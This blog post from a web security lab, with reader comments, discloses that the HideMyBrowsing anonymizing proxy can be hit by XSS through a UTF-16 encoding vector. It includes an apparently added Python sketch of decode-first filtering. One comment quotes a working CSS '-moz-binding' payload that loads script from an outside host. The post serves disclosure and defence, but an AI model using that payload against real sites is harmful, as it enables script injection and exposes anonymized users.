web application security lab

HideMyBrowsing Vulnerable to XSS and De-anonymization

I’ve always loved CGI proxies because they have to deal with all the same problems that every other application has to deal with, plus they have to try to force anything and everything that connects back to the remote machine into their pipe so they can proxy it. Alas, it’s just not that easy. HideMyBrowsing.com is designed to protect users from being seen by content filters. Firstly, how long will it take for content filters to block the proxy itself? But even if you put that aside, along with the obvious problem of people using the service to launch malicious PHP injection and the like, they are still vulnerable.

The very first thing I tried was the UTF-16 vector. Normally they strip out JavaScript, and they do a fairly good job of it, but like all systems this complex they don’t anticipate everything, and as a result they are vulnerable to XSS. Normally that’s bad enough in and of itself, but this time it’s worse. If the website uses UTF-16, it can force the user’s browser to connect back to the machine in question, thereby de-anonymizing the user, making their viewing visible to content filters, and running JavaScript in the context of hidemybrowsing.com. Bad bad bad.

I’m sure it’s vulnerable to other vectors as well; that was just the first one I tried. So while it’s an interesting and vaguely clever use of CGI, I wouldn’t rely on it if you could get fired for looking at porn at work.
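The encoding vector above only slips past a filter that matches on raw bytes before it knows what charset the page is in. As an added illustration (my own code, not anything from hidemybrowsing.com or from the post), the following shows a byte-level script filter missing a UTF-16 body, and the decode-first alternative a proxy should use: sniff or honour the charset, decode to text, strip there, then re-serve in one known charset. The sample page, the sniffing heuristic and all function names are constructed for the example.

```python
import re
from typing import Optional, Tuple

# Constructed sample: the same page body as a proxy might receive it from
# an upstream server, once with a BOM, once without, and once as UTF-8.
PAGE_TEXT = "<html><body><script>alert(1)</script></body></html>"
SAMPLE_UTF16_BOM = PAGE_TEXT.encode("utf-16")      # BOM + native byte order
SAMPLE_UTF16_NO_BOM = PAGE_TEXT.encode("utf-16-le")
SAMPLE_UTF8 = PAGE_TEXT.encode("utf-8")

SCRIPT_BYTES_RE = re.compile(rb"<\s*script", re.IGNORECASE)
SCRIPT_TEXT_RE = re.compile(r"<\s*script\b.*?<\s*/\s*script\s*>", re.IGNORECASE | re.DOTALL)


def naive_filter_finds_script(raw: bytes) -> bool:
    """Byte-level match on the raw body: UTF-16 interleaves NUL bytes, so
    b'<\\x00s\\x00c...' never matches b'<script' and the tag is passed through."""
    return SCRIPT_BYTES_RE.search(raw) is not None


def sniff_encoding(raw: bytes, declared: Optional[str] = None) -> str:
    """Pick the charset the browser would actually use for this body (heuristic
    constructed for the example: BOM first, then the declared charset, then a
    NUL-byte pattern check, else UTF-8)."""
    if raw.startswith(b"\xff\xfe") or raw.startswith(b"\xfe\xff"):
        return "utf-16"          # Python's utf-16 codec consumes the BOM
    if declared:
        return declared
    head = raw[:512]
    if len(head) >= 4:
        odd_nul = head[1::2].count(0) / len(head[1::2])
        even_nul = head[0::2].count(0) / len(head[0::2])
        if odd_nul > 0.5:
            return "utf-16-le"   # ASCII text in UTF-16LE: every odd byte is NUL
        if even_nul > 0.5:
            return "utf-16-be"
    return "utf-8"


def decode_then_filter(raw: bytes, declared: Optional[str] = None) -> bool:
    """Decode before matching, so the filter sees the same text the browser will."""
    text = raw.decode(sniff_encoding(raw, declared), errors="replace")
    return SCRIPT_TEXT_RE.search(text) is not None


def sanitize_for_proxy(raw: bytes, declared: Optional[str] = None) -> Tuple[bytes, str]:
    """Decode, strip script elements in text space, re-encode as UTF-8 and return
    the body with the Content-Type the proxy should send, so the browser cannot
    re-sniff the rewritten page into a charset the filter never examined."""
    text = raw.decode(sniff_encoding(raw, declared), errors="replace").lstrip("\ufeff")
    cleaned = SCRIPT_TEXT_RE.sub("", text)
    return cleaned.encode("utf-8"), "text/html; charset=utf-8"
```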

6 Responses to “HideMyBrowsing Vulnerable to XSS and De-anonymization”

  1. Wladimir Palant Says:

    Yes, that’s worse than MySpace - these anonymizers have to sanitize CSS somehow in a way that won’t cripple the pages entirely. From the look of it they ignore the problem entirely: both hidemybrowsing.com and anonymizer.ru fail for a simple style="-moz-binding: url(http://ha.ckers.org/xssmoz.xml#xss)".

  2. Jeremiah Blatz Says:

    I’m sure there’s a java-based browser out there that’s moderately functional. Load that in an applet and have it proxy *all* communications through the anonymizing server. … that should work, right? I guess failing that you could just run the browser on the server and send imagemaps/applet vnc back to the user.

  3. James L Says:

    Are you sure you did not mean www.hidemybrowsing.info not .com?

    We are not using CGI Proxy or PHP Proxy.

    Thanks

    James

  4. RSnake Says:

    Hi, James, no, I’m not aware of hidemybrowsing.info (maybe they have the same flaw - I haven’t checked). I’m definitely referring to hidemybrowsing.com. I wasn’t intending to say you used PHP or any specific technology, but rather that this is essentially the same thing and they all suffer from the same problems.

    But for some reason I think the term “CGI” is wildly misunderstood. CGI only means “Common Gateway Interface”. It just means that some program is authorized to be run by anyone (it can be written in anything):
    http://hoohoo.ncsa.uiuc.edu/cgi/intro.html

  5. James L. Says:

    Can you send me the various flaws that you find in the web proxies out there? If I know about them then I am sure they can be fixed? Correct?

    James

  6. RSnake Says:

    James, I’ll just send you an email - we can take this offline.